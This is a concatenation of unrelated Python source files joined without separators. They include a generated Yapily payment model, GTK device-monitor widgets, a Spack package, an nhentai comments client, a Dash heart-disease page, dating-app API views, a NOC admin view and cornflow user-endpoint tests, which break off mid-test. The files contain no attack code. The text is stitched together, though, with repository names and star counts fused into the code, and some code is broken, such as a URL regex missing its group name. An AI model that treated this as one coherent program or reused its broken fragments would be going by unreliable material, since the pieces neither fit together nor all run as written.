[buildings , math, science , garedening , biology , nature , planning , culture , politics , social , people , speech, language, engineering, computer, graphics , programming, Systems , development , animation , communication , media , design , aesthetics , art , chemistry , physics , anamoty , photography , history , painting , drawing , psychology ] print(len(array)) def printZeros(x): total = range(33-x) for i in total: print(0,end=',') #printZeros(5) import random def printRandom(): total = range(33) for i in total: print(random.randint(0,5), end=",") #printRandom() import json with open('answers.json') as f: data = json.load(f) keys = list(data[0]) for q in data: print(f'{[q["question"]]}:{[q["answer"]]}') 10-100 # coding: utf-8 """ Yapily API To access endpoints that require authentication, use your application key and secret created in the Dashboard (https://dashboard.yapily.com) # noqa: E501 The version of the OpenAPI document: 1.154.0 Generated by: https://openapi-generator.tech """ import pprint import re # noqa: F401 import six from yapily.configuration import Configuration class PeriodicPaymentRequest(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'frequency': 'FrequencyRequest', 'number_of_payments': 'int', 'next_payment_date_time': 'datetime', 'next_payment_amount': 'Amount', 'final_payment_date_time': 'datetime', 'final_payment_amount': 'Amount' } attribute_map = { 'frequency': 'frequency', 'number_of_payments': 'numberOfPayments', 'next_payment_date_time': 'nextPaymentDateTime', 'next_payment_amount': 'nextPaymentAmount', 'final_payment_date_time': 'finalPaymentDateTime', 'final_payment_amount': 'finalPaymentAmount' } def __init__(self, frequency=None, number_of_payments=None, next_payment_date_time=None, next_payment_amount=None, final_payment_date_time=None, final_payment_amount=None, local_vars_configuration=None): # noqa: E501 """PeriodicPaymentRequest - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration() self.local_vars_configuration = local_vars_configuration self._frequency = None self._number_of_payments = None self._next_payment_date_time = None self._next_payment_amount = None self._final_payment_date_time = None self._final_payment_amount = None self.discriminator = None self.frequency = frequency if number_of_payments is not None: self.number_of_payments = number_of_payments if next_payment_date_time is not None: self.next_payment_date_time = next_payment_date_time if next_payment_amount is not None: self.next_payment_amount = next_payment_amount if final_payment_date_time is not None: self.final_payment_date_time = final_payment_date_time if final_payment_amount is not None: self.final_payment_amount = final_payment_amount @property def frequency(self): """Gets the frequency of this PeriodicPaymentRequest. # noqa: E501 :return: The frequency of this PeriodicPaymentRequest. # noqa: E501 :rtype: FrequencyRequest """ return self._frequency @frequency.setter def frequency(self, frequency): """Sets the frequency of this PeriodicPaymentRequest. :param frequency: The frequency of this PeriodicPaymentRequest. # noqa: E501 :type: FrequencyRequest """ if self.local_vars_configuration.client_side_validation and frequency is None: # noqa: E501 raise ValueError("Invalid value for `frequency`, must not be `None`") # noqa: E501 self._frequency = frequency @property def number_of_payments(self): """Gets the number_of_payments of this PeriodicPaymentRequest. # noqa: E501 :return: The number_of_payments of this PeriodicPaymentRequest. # noqa: E501 :rtype: int """ return self._number_of_payments @number_of_payments.setter def number_of_payments(self, number_of_payments): """Sets the number_of_payments of this PeriodicPaymentRequest. :param number_of_payments: The number_of_payments of this PeriodicPaymentRequest. # noqa: E501 :type: int """ self._number_of_payments = number_of_payments @property def next_payment_date_time(self): """Gets the next_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :return: The next_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :rtype: datetime """ return self._next_payment_date_time @next_payment_date_time.setter def next_payment_date_time(self, next_payment_date_time): """Sets the next_payment_date_time of this PeriodicPaymentRequest. :param next_payment_date_time: The next_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :type: datetime """ self._next_payment_date_time = next_payment_date_time @property def next_payment_amount(self): """Gets the next_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :return: The next_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :rtype: Amount """ return self._next_payment_amount @next_payment_amount.setter def next_payment_amount(self, next_payment_amount): """Sets the next_payment_amount of this PeriodicPaymentRequest. :param next_payment_amount: The next_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :type: Amount """ self._next_payment_amount = next_payment_amount @property def final_payment_date_time(self): """Gets the final_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :return: The final_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :rtype: datetime """ return self._final_payment_date_time @final_payment_date_time.setter def final_payment_date_time(self, final_payment_date_time): """Sets the final_payment_date_time of this PeriodicPaymentRequest. :param final_payment_date_time: The final_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :type: datetime """ self._final_payment_date_time = final_payment_date_time @property def final_payment_amount(self): """Gets the final_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :return: The final_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :rtype: Amount """ return self._final_payment_amount @final_payment_amount.setter def final_payment_amount(self, final_payment_amount): """Sets the final_payment_amount of this PeriodicPaymentRequest. :param final_payment_amount: The final_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :type: Amount """ self._final_payment_amount = final_payment_amount def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, PeriodicPaymentRequest): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, PeriodicPaymentRequest): return True return self.to_dict() != other.to_dict() michel4j/mxdc import logging import operator from gi.repository import Gtk, Pango, GLib from mxdc.devices.manager import BaseManager from mxdc.widgets import timer def value_class(val, warning, error): if (val < warning < error) or (val > warning > error): return "" elif (warning < val < error) or (warning > val > error): return "dev-warning" elif (warning < error < val) or (warning > error > val): return "dev-error" else: return "" class DeviceMonitor(object): def __init__(self, device, label, format='{:.3e}', signal='changed', warning=None, error=None): self.text = label self.device = device self.format = format self.warning = warning self.error = error self.device.connect(signal, self.on_signal) def on_signal(self, obj, *args): if isinstance(self.format, str): display_text = self.format.format(*args) elif callable(self.format): display_text = self.format(*args) else: display_text = args[0] self.text.set_text(display_text) style = self.text.get_style_context() if self.warning and self.error: style_class = value_class(args[0], self.warning, self.error) for name in ['dev-warning', 'dev-error']: if style_class == name: style.add_class(name) else: style.remove_class(name) class PropertyMonitor(object): def __init__(self, device, property, widget, format='{:.3e}', warning=None, error=None): self.widget = widget self.device = device self.property = property self.format = format self.warning = warning self.error = error self.device.connect('notify::{}'.format(self.property), self.on_value_changed) self.device.bind_property(self.property, self.widget, 'text', 0, self.transform) def transform(self, obj, value): return self.format.format(value) def on_value_changed(self, *args, **kwargs): if self.warning and self.error: value = self.device.get_property(self.property) style = self.widget.get_style_context() style_class = value_class(value, self.warning, self.error) for name in ['dev-warning', 'dev-error']: if style_class == name: style.add_class(name) else: style.remove_class(name) class ShutterSwitcher(object): def __init__(self, device, switch, reverse=False, openonly=False): self.device = device self.switch = switch self.reverse = reverse self.openonly = openonly self.dev_link = self.device.connect('changed', self.on_state_change) self.sw_link = self.switch.connect('notify::active', self.on_shutter_activated) def watch(self): self.switch.handler_unblock(self.sw_link) def unwatch(self): self.switch.handler_block(self.sw_link) def on_state_change(self, obj, state): self.unwatch() self.switch.set_state(operator.xor(state, self.reverse)) self.watch() def on_shutter_activated(self, obj, param): state = self.switch.get_active() if operator.xor(state, self.reverse): self.device.open() elif not self.openonly: self.device.close() class ScaleMonitor(object): def __init__(self, scale, device, minimum=0.0, maximum=100.0): self.scale = scale self.device = device self.minimum = minimum self.maximum = maximum self.in_progress = False self.adjustment = self.scale.get_adjustment() self.adjustment.connect('value-changed', self.on_value_set) self.device.connect('changed', self.on_update) def on_value_set(self, obj): if not self.in_progress: if hasattr(self.device, 'move_to'): self.device.move_to(self.adjustment.props.value) elif hasattr(self.device, 'set'): self.device.set(self.adjustment.props.value) def on_update(self, obj, val): self.in_progress = True self.adjustment.props.value = val self.in_progress = False class BoolMonitor(object): def __init__(self, device, entry, value_map, signal='changed', inverted=False): self.device = device self.entry = entry self.value_map = value_map self.inverted = inverted self.device.connect(signal, self.on_signal) def on_signal(self, obj, state): txt = self.value_map.get(state, str(state)) self.entry.set_text(txt) style = self.entry.get_style_context() if state == self.inverted: style.add_class('state-active') style.remove_class('state-inactive') else: style.remove_class('state-active') style.add_class('state-inactive') class ModeMonitor(object): MODE_MAP = { BaseManager.ModeType.MOUNT: 'mounting', BaseManager.ModeType.CENTER: 'centering', BaseManager.ModeType.COLLECT: 'collecting', BaseManager.ModeType.ALIGN: 'aligning', BaseManager.ModeType.UNKNOWN: 'unknown', } def __init__(self, device, entry, signal='changed'): self.device = device self.entry = entry self.value_map = self.MODE_MAP self.device.connect(signal, self.on_signal) def on_signal(self, obj, state): if state == BaseManager.ModeType.BUSY: self.entry.set_text('BUSY') else: value = self.value_map.get(state, 'unknown') self.entry.set_text(value.upper()) style = self.entry.get_style_context() for name in self.value_map.values(): style.remove_class(f'mode-{name}') style.add_class(f'mode-{value}') class AppNotifier(object): def __init__(self, label, revealer, button): self.label = label self.revealer = revealer self.close_button = button self.box = self.label.get_parent() self.close_button.connect('clicked', self.on_notifier_closed) self.timer_shown = False self.timer = timer.Timer() # self.box.pack_start(self.timer, False, False, 0) # self.box.show_all() def on_notifier_closed(self, button): self.close() def notify(self, message, level=Gtk.MessageType.INFO, important=False, duration=3, show_timer=False): """ Display an in-app notification. :param message: Text to display :param level: Gtk.MessageType :param duration: Duration too display message in seconds. Ignored if 'important' is True :param important: Boolean, if True, the message stays on until closed manually :param show_timer: Boolean, if True, a timer will be shown :return: """ if self.revealer.get_reveal_child(): self.revealer.set_reveal_child(False) self.label.set_text(message) if show_timer: self.timer.start(duration) self.box.pack_start(self.timer, False, False, 3) self.timer.show() self.timer_shown = True self.revealer.set_reveal_child(True) if not important: GLib.timeout_add(1000 * duration, self.close) def close(self): self.revealer.set_reveal_child(False) if self.timer_shown: self.box.remove(self.timer) self.timer_shown = False class GUIHandler(logging.Handler): def __init__(self, viewer): logging.Handler.__init__(self) self.viewer = viewer def emit(self, record): GLib.idle_add(self.viewer.add_text, self.format(record), record.levelno) class StatusMonitor(object): def __init__(self, widget, devices=()): self.devices = set() self.spinner = widget.spinner self.text = widget.status_lbl for dev in devices: self.add(dev) def add(self, *args): for device in args: self.devices.add(device) device.connect('message', self.on_message) device.connect('busy', self.check_busy) def on_message(self, device, message): """ Set the message directly if spinner is busy otherwise set to blank""" message = message if message else 'Busy ...' self.text.set_text(f'{device.name} - {message}') self.check_busy() def check_busy(self, *args, **kwargs): if any(dev.is_busy() for dev in self.devices): self.spinner.start() else: self.spinner.stop() self.text.set_text('') class LogMonitor(object): def __init__(self, log_box, size=5000, font='Monospace 8'): self.buffer_size = size self.scroll_win = log_box self.view = log_box.get_child() self.text_buffer = self.view.get_buffer() self.view.set_editable(False) pango_font = Pango.FontDescription(font) self.view.modify_font(pango_font) self.wrap_mode = Gtk.WrapMode.WORD self.prefix = '' color_chart = { logging.INFO: 'Black', logging.CRITICAL: '#d2413a', logging.DEBUG: '#3a7ca8', logging.ERROR: '#D2413A', logging.WARNING: '#e98b39', } self.tags = {} for key, v in list(color_chart.items()): self.tags[key] = self.text_buffer.create_tag(foreground=v) self.view.connect('size-allocate', self.content_changed) def content_changed(self, widget, event, data=None): adj = self.scroll_win.get_vadjustment() adj.set_value(adj.get_upper() - adj.get_page_size()) def set_prefix(self, txt): self.prefix = txt def clear(self): self.text_buffer.delete(self.text_buffer.get_start_iter(), self.text_buffer.get_end_iter()) def add_text(self, text, level=logging.INFO): linecount = self.text_buffer.get_line_count() if linecount > self.buffer_size: start_iter = self.text_buffer.get_start_iter() end_iter = self.text_buffer.get_start_iter() end_iter.forward_lines(10) self.text_buffer.delete(start_iter, end_iter) loc = self.text_buffer.get_end_iter() if level == logging.INFO: self.text_buffer.insert(loc, f"{self.prefix}{text}\n") else: tag = self.tags[level] self.text_buffer.insert_with_tags(loc, f"{self.prefix}{text}\n", tag) class Tuner(object): def __init__(self, tuner, tune_up_btn, tune_down_btn, reset_btn=None, repeat_interval=100): self.tuner = tuner self.tune_up_btn = tune_up_btn self.tune_down_btn = tune_down_btn self.reset_btn = reset_btn self.repeat_interval = repeat_interval self.tune_func = None self.tune_up_btn.connect('button-press-event', self.on_tune_up) self.tune_down_btn.connect('button-press-event', self.on_tune_down) self.tune_up_btn.connect('button-release-event', self.cancel_tuning) self.tune_down_btn.connect('button-release-event', self.cancel_tuning) if self.reset_btn: self.reset_btn.connect('clicked', lambda x: tuner.reset()) def repeat_tuning(self): if self.tune_func: self.tune_func() return True def on_tune_up(self, button, event): if event.button == 1: self.tune_func = self.tuner.tune_up self.tuner.tune_up() GLib.timeout_add(self.repeat_interval, self.repeat_tuning) def on_tune_down(self, button, event): if event.button == 1: self.tune_func = self.tuner.tune_down self.tuner.tune_down() GLib.timeout_add(self.repeat_interval, self.repeat_tuning) def cancel_tuning(self, *args, **kwargs): self.tune_func = None # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * # Only build certain parts of dwarf because the other ones break. dwarf_dirs = ['libdwarf', 'dwarfdump2'] class Libdwarf(Package): homepage = "http://www.prevanders.net/dwarf.html" url = "http://www.prevanders.net/libdwarf-20130729.tar.gz" list_url = homepage version(20130729, "64b42692e947d5180e162e46c689dfbf") version(20130207, 'foobarbaz') version(20111030, 'foobarbaz') version(20070703, 'foobarbaz') depends_on("libelf") def install(self, spec, prefix): touch(prefix.libdwarf) NHentaidesu/methods/doujinshi/comments.py1-10 from NHentaidesu import types from NHentaidesu.scaffold import Scaffold from datetime import datetime from typing import List class GetComments(Scaffold): async def get_comments(self, book_id: int) -> List["types.DoujinComments"]: result = await self.request_api(f"/gallery/{book_id}/comments") comments = types.List() for res in result: comment = types.DoujinComments._parse( self, id=res['id'], gallery_id=res['gallery_id'], user=types.GetUser._parse( self, id=res['poster']['id'], username=res['poster']['username'], slug=res['poster']['slug'], avatar=res['poster']['avatar_url'], is_superuser=res['poster']['is_superuser'], is_staff=res['poster']['is_staff'], ), post_date=datetime.fromtimestamp(res['post_date']), text=res['body'] ) comments.append(comment) return comments async def flag_comment(self, comment_id: int, reason: str) -> bool: await self.request_api( f"/comments/{comment_id}/flag", method="POST", json={'reason': reason} ) return True async def delete_comment(self, comment_id: int) -> bool: await self.request_api( f"/comments/{comment_id}/delete", method="POST" ) return True # DEPRECATED, NHENTAI USING RECAPTCHA # async def submit_comment(self, book_id: int, text: str): # result = await self.request_api( # f"/comments/{book_id}/delete", # method="POST", # data=text # ) # return result # Imports from 3rd party libraries import dash import dash_bootstrap_components as dbc import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.express as px import pandas as pd # Imports from this application from app import app hd_r = pd.read_csv('assets/hd_renamed.csv') hd_r_thal_2_yes = hd_r[hd_r['thal_2'] == 1] hd_r_cp_0_yes = hd_r[hd_r['chest_pain_0'] == 1] hd_r_thal_3_yes = hd_r[hd_r['thal_3'] == 1] # fig = px.scatter(hd_r, x='cholestoral', y='thal_2', color='target', marginal_x='histogram') fig2 = px.scatter(hd_r_thal_2_yes, x='age', y='sex', color='target', marginal_x='histogram') fig3 = px.scatter(hd_r_cp_0_yes, x='age', y='sex', color='target', marginal_x='histogram') fig4 = px.scatter(hd_r_thal_3_yes, x='age', y='sex', color='target', marginal_x='histogram') # 1 column layout # https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout column1 = dbc.Col( [ dcc.Markdown( """ ## Insights Heart disease is the leading cause of death for men, women, and people of most racial and ethnic groups in the United States. One person dies every 37 seconds in the United States from cardiovascular disease. About 647,000 Americans die from heart disease each year—that's 1 in every 4 deaths. https://www.cdc.gov/heartdisease/facts.htm In my project I used features importance to find out which of them are more important in predicting a heart disease """ ), html.Img(src='assets/ThalliumStressTest.jpg', className='img-fluid'), dcc.Markdown( ''' From the feature importance and Eli5 permutation importance for RandomForestClassifier you can see that some of the features are more correlated to the target than the others. '''), html.Img(src='assets/feature_importance.png', className='img-fluid'), html.Img(src='assets/permutation_importance.png', className='img-fluid'), dcc.Markdown( ''' Positive results on Thallium stress test type 2 has a big impact on prediction the patients who have a heart disease. On the other hand Chest Pain type 0 and Thallium stress test type 3 have a more positive correlation with those patients who doesn't have a heart disease. '''), dcc.Markdown('#### Thallium stress test type 2 positive'), dcc.Graph(figure=fig2), dcc.Markdown( ''' You can interact with the plot to see the impact on those who have Thallium stress test type 2, Chest pain type 0 or Thallium stress test type 3 in correlation to the target. 1 = got a disease, 0 = doesn't have a disease. '''), dcc.Markdown('#### Chest Pain type 0 positive'), dcc.Graph(figure=fig3), dcc.Markdown('#### Thallium stress test type 3 positive'), dcc.Graph(figure=fig4), ], ) layout = dbc.Row([column1])social/apis.py from common import errors from libs.cache import rds from libs.http import render_json from social import logics from social.models import Swiped from social.permissions import has_perm from user.models import User def recommend(request): user = request.user rec_users = logics.recommend_users(user) users = [u.to_dict() for u in rec_users] return render_json(data=users) def like(request): user = request.user sid = request.POST.get('sid') if sid is None: return render_json(code=errors.SID_ERR) sid = int(sid) matched = logics.like_someone(user.id, sid) return render_json(data={'matched': matched}) @has_perm('superlike') def superlike(request): user = request.user sid = request.POST.get('sid') if sid is None: return render_json(code=errors.SID_ERR) sid = int(sid) matched = logics.superlike_someone(user.id, sid) return render_json(data={'matched': matched}) def dislike(request): user = request.user sid = request.POST.get('sid') if sid is None: return render_json(code=errors.SID_ERR) sid = int(sid) ret = Swiped.swipe(uid=user.id, sid=sid, mark='dislike') if ret: logics.update_swipe_score(sid, 'dislike') return render_json() @has_perm('rewind') def rewind(request): """ 反悔接口 :param request: :return: """ user = request.user logics.rewind(user) return render_json() @has_perm('liked_me') def liked_me(request): user = request.user uid_list = logics.liked_me(user) users = [u.to_dict() for u in User.objects.filter(id__in=uid_list)] return render_json(data=users) def top_rank(request): user_rank = logics.get_top_rank(10) return render_json(data=user_rank)10-100 # ---------------------------------------------------------------------- # aaa.modelprotectionprofile application # ---------------------------------------------------------------------- # Copyright (C) 2007-2020 The NOC Project # See LICENSE for details # ---------------------------------------------------------------------- # NOC modules from noc.lib.app.extdocapplication import ExtDocApplication, view from noc.aaa.models.modelprotectionprofile import ( ModelProtectionProfile, FieldAccess, FIELD_PERMISSIONS, ) from noc.core.translation import ugettext as _ from noc.models import get_model, is_document from noc.core.comp import smart_text IGNORED_FIELDS = {"id", "bi_id"} class ModelProtectionProfileApplication(ExtDocApplication): """ ModelProtection Profile application """ title = "ModelProtection Profile" menu = [_("Setup"), _("ModelProtection Profile")] model = ModelProtectionProfile # glyph = "key" @view(url=r"^(?P\w+\.\w+)/fields/lookup/$", method=["GET"], access="lookup", api=True) def api_model_fields_lookup(self, request, model_id): try: model = get_model(model_id=model_id) except AssertionError: return self.render_json( {"status": False, "message": "Not found model by id: %s" % model_id}, status=self.NOT_FOUND, ) # Get links if is_document(model): fields = model._fields else: fields = [f.name for f in model._meta.fields] return [{"id": name, "label": name} for name in fields if name not in IGNORED_FIELDS] def instance_to_dict(self, o, fields=None, nocustom=False): if isinstance(o, FieldAccess): return { "name": smart_text(o.name), "name__label": smart_text(o.name), "permission": o.permission, "permission__label": FIELD_PERMISSIONS[o.permission], } return super().instance_to_dict(o, fields, nocustom) baobabsoluciones/cornflow-server import json from flask_testing import TestCase from cornflow.app import create_app from cornflow.commands import AccessInitialization from cornflow.models import ( CaseModel, ExecutionModel, InstanceModel, UserModel, UserRoleModel, ) from cornflow.shared.const import ADMIN_ROLE, PLANNER_ROLE, SERVICE_ROLE, VIEWER_ROLE from cornflow.shared.utils import db from cornflow.tests.const import ( CASE_PATH, CASE_URL, EXECUTION_PATH, EXECUTION_URL_NORUN, INSTANCE_PATH, INSTANCE_URL, LOGIN_URL, SIGNUP_URL, USER_URL, ) class TestUserEndpoint(TestCase): def create_app(self): app = create_app("testing") return app def setUp(self): db.create_all() AccessInitialization().run() self.url = USER_URL self.model = UserModel self.viewer = dict( username="aViewer", email="", password="" ) self.planner = dict( username="aPlanner", email="", password="", first_name="first_planner", last_name="last_planner", ) self.planner_2 = dict( username="aSecondPlanner", email="", password="" ) self.admin = dict( username="anAdminUser", email="", password="" ) self.admin_2 = dict( username="aSecondAdmin", email="", password="" ) self.service_user = dict( username="aServiceUser", email="", password="", ) self.login_keys = ["username", "password"] self.items_to_check = ["email", "username", "id"] self.modifiable_items = [ "email", "username", "password", "first_name", "last_name", ] self.payloads = [ self.viewer, self.planner, self.planner_2, self.admin, self.admin_2, self.service_user, ] for u_data in self.payloads: response = self.client.post( SIGNUP_URL, data=json.dumps(u_data), follow_redirects=True, headers={"Content-Type": "application/json"}, ) u_data["id"] = response.json["id"] if "viewer" in u_data["email"]: user_role = UserRoleModel( {"user_id": u_data["id"], "role_id": VIEWER_ROLE} ) user_role.save() UserRoleModel.query.filter_by( user_id=u_data["id"], role_id=PLANNER_ROLE ).delete() db.session.commit() if "admin" in u_data["email"]: user_role = UserRoleModel( {"user_id": u_data["id"], "role_id": ADMIN_ROLE} ) user_role.save() if "service_user" in u_data["email"]: user_role = UserRoleModel( {"user_id": u_data["id"], "role_id": SERVICE_ROLE} ) user_role.save() db.session.commit() def tearDown(self): db.session.remove() db.drop_all() def log_in(self, user): data = {k: user[k] for k in self.login_keys} return self.client.post( LOGIN_URL, data=json.dumps(data), follow_redirects=True, headers={"Content-Type": "application/json"}, ) def get_user(self, user_asks, user_asked=None): data = {k: user_asks[k] for k in self.login_keys} url = self.url if user_asked is not None: url += "{}/".format(user_asked["id"]) token = self.client.post( LOGIN_URL, data=json.dumps(data), follow_redirects=True, headers={"Content-Type": "application/json"}, ).json["token"] return self.client.get( url, follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) def get_non_existing_user(self): pass def make_admin(self, user_asks, user_asked, make_admin=1): token = self.log_in(user_asks).json["token"] url = "{}{}/{}/".format(self.url, user_asked["id"], make_admin) return self.client.put( url, follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) def modify_info(self, user_asks, user_asked, payload): token = self.log_in(user_asks).json["token"] url = "{}{}/".format(self.url, user_asked["id"]) return self.client.put( url, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) def delete_user(self, user_asks, user_asked): token = self.log_in(user_asks).json["token"] url = "{}{}/".format(self.url, user_asked["id"]) return self.client.delete( url, follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) def test_get_all_users_service_user(self): # the service role should not be able to get the users response = self.get_user(self.service_user) self.assertEqual(403, response.status_code) def test_get_all_users_user(self): # a simple user should not be able to do it response = self.get_user(self.planner) self.assertEqual(403, response.status_code) self.assertTrue("error" in response.json) def test_get_all_users_admin(self): # An admin should be able to get all users response = self.get_user(self.admin) self.assertEqual(200, response.status_code) self.assertEqual(len(response.json), len(self.payloads)) def test_get_same_user(self): # if a user asks for itself: it's ok for u_data in [self.planner, self.admin, self.service_user]: response = self.get_user(u_data, u_data) self.assertEqual(200, response.status_code) for item in self.items_to_check: self.assertEqual(response.json[item], u_data[item]) def test_get_another_user(self): response = self.get_user(self.planner, self.admin) self.assertEqual(400, response.status_code) self.assertTrue("error" in response.json) def test_get_another_user_admin(self): response = self.get_user(self.admin, self.planner) self.assertEqual(200, response.status_code) for item in self.items_to_check: self.assertEqual(response.json[item], self.planner[item]) def test_user_makes_someone_admin(self): response = self.make_admin(self.planner, self.planner) self.assertEqual(403, response.status_code) def test_service_user_makes_someone_admin(self): response = self.make_admin(self.service_user, self.planner) self.assertEqual(403, response.status_code) def test_admin_makes_someone_admin(self): response = self.make_admin(self.admin, self.planner) self.assertEqual(200, response.status_code) self.assertEqual(True, UserRoleModel.is_admin(self.planner["id"])) def test_admin_takes_someone_admin(self): response = self.make_admin(self.admin, self.admin_2, 0) self.assertEqual(200, response.status_code) self.assertEqual(False, UserRoleModel.is_admin(self.planner["id"])) def test_user_deletes_admin(self): response = self.delete_user(self.planner, self.admin) self.assertEqual(403, response.status_code) def test_admin_deletes_service_user(self): response = self.delete_user(self.admin, self.service_user) self.assertEqual(403, response.status_code) def test_admin_deletes_user(self): response = self.delete_user(self.admin, self.planner) self.assertEqual(200, response.status_code) response = self.get_user(self.admin, self.planner) self.assertEqual(404, response.status_code) def test_service_user_deletes_admin(self): response = self.delete_user(self.service_user, self.admin) self.assertEqual(403, response.status_code) def test_edit_info(self): payload = { "username": "newtestname", "email": "", "first_name": "FirstName", "last_name": "LastName", } response = self.modify_info(self.planner, self.planner, payload) self.assertEqual(200, response.status_code) for item in self.modifiable_items: if item != "password": self.assertEqual(response.json[item], payload[item]) self.assertNotEqual(response.json[item], self.planner[item]) def test_admin_edit_info(self): payload = { "username": "newtestname", "email": "", "first_name": "FirstName", "last_name": "LastName", } response = self.modify_info(self.admin, self.planner, payload) self.assertEqual(200, response.status_code) for item in self.modifiable_items: if item != "password": self.assertEqual(response.json[item], payload[item]) self.assertNotEqual(response.json[item], self.planner[item]) def test_edit_other_user_info(self): payload = {"username": "newtestname", "email": ""} response = self.modify_info(self.planner_2, self.planner, payload) self.assertEqual(403, response.status_code) def test_change_password(self): payload = {"password": ""} response = self.modify_info(self.planner, self.planner, payload) self.assertEqual(200, response.status_code) self.planner["password"] = payload["password"] response = self.log_in(self.planner) self.assertEqual(200, response.status_code) self.assertIsNotNone(response.json["token"]) def test_change_other_user_password(self): payload = {"password": ""} response = self.modify_info(self.planner_2, self.planner, payload) self.assertEqual(403, response.status_code) def test_admin_change_password(self): payload = {"password": ""} response = self.modify_info(self.admin, self.planner, payload) self.assertEqual(200, response.status_code) self.planner["password"] = payload["password"] response = self.log_in(self.planner) self.assertEqual(200, response.status_code) self.assertIsNotNone(response.json["token"]) def test_service_user_change_password(self): payload = {"password": ""} response = self.modify_info(self.service_user, self.planner, payload) self.assertEqual(403, response.status_code) def test_viewer_user_change_password(self): payload = {"password": ""} response = self.modify_info(self.viewer, self.viewer, payload) self.assertEqual(200, response.status_code) self.viewer["password"] = payload["password"] response = self.log_in(self.viewer) self.assertEqual(200, response.status_code) self.assertIsNotNone(response.json["token"]) class TestUserModel(TestCase): def create_app(self): app = create_app("testing") return app def setUp(self): db.create_all() AccessInitialization().run() self.url = USER_URL self.model = UserModel self.admin = dict( username="anAdminUser", email="", password="" ) response = self.client.post( SIGNUP_URL, data=json.dumps(self.admin), follow_redirects=True, headers={"Content-Type": "application/json"}, ) self.admin["id"] = response.json["id"] user_role = UserRoleModel({"user_id": self.admin["id"], "role_id": ADMIN_ROLE}) user_role.save() db.session.commit() self.login_keys = ["username", "password"] self.viewer = dict( username="aViewer", email="", password="" ) response = self.client.post( SIGNUP_URL, data=json.dumps(self.viewer), follow_redirects=True, headers={"Content-Type": "application/json"}, ) self.viewer["id"] = response.json["id"] def tearDown(self): db.session.remove() db.drop_all() def log_in(self, user): data = {k: user[k] for k in self.login_keys} return self.client.post( LOGIN_URL, data=json.dumps(data), follow_redirects=True, headers={"Content-Type": "application/json"}, ) def test_instance_delete_cascade(self): response = self.log_in(self.admin) token = response.json["token"] user_id = response.json["id"] with open(INSTANCE_PATH) as f: payload = json.load(f) response = self.client.post( INSTANCE_URL, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(201, response.status_code) instance_id = response.json["id"] response = self.client.delete( self.url + str(user_id) + "/", follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(200, response.status_code) instance = InstanceModel.query.get(instance_id) self.assertIsNone(instance) def test_instance_execution_delete_cascade(self): response = self.log_in(self.admin) token = response.json["token"] user_id = response.json["id"] with open(INSTANCE_PATH) as f: payload = json.load(f) response = self.client.post( INSTANCE_URL, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(201, response.status_code) instance_id = response.json["id"] with open(EXECUTION_PATH) as f: payload = json.load(f) payload["instance_id"] = instance_id response = self.client.post( EXECUTION_URL_NORUN, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(201, response.status_code) execution_id = response.json["id"] response = self.client.delete( self.url + str(user_id) + "/", follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(200, response.status_code) instance = InstanceModel.query.get(instance_id) execution = ExecutionModel.query.get(execution_id) self.assertIsNone(instance) self.assertIsNone(execution) def test_case_delete_cascade(self): response = self.log_in(self.admin) token = response.json["token"] user_id = response.json["id"] with open(CASE_PATH) as f: payload = json.load(f) response = self.client.post( CASE_URL, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(201, response.status_code) case_id = response.json["id"] response = self.client.delete( self.url + str(user_id) + "/", follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(200, response.status_code) case = CaseModel.query.get(case_id) self.assertIsNone(case) def test_user_role_delete_cascade(self): response = self.log_in(self.admin) token = response.json["token"] user_id = response.json["id"] user_role = UserRoleModel.query.filter_by(user_id=user_id).first() 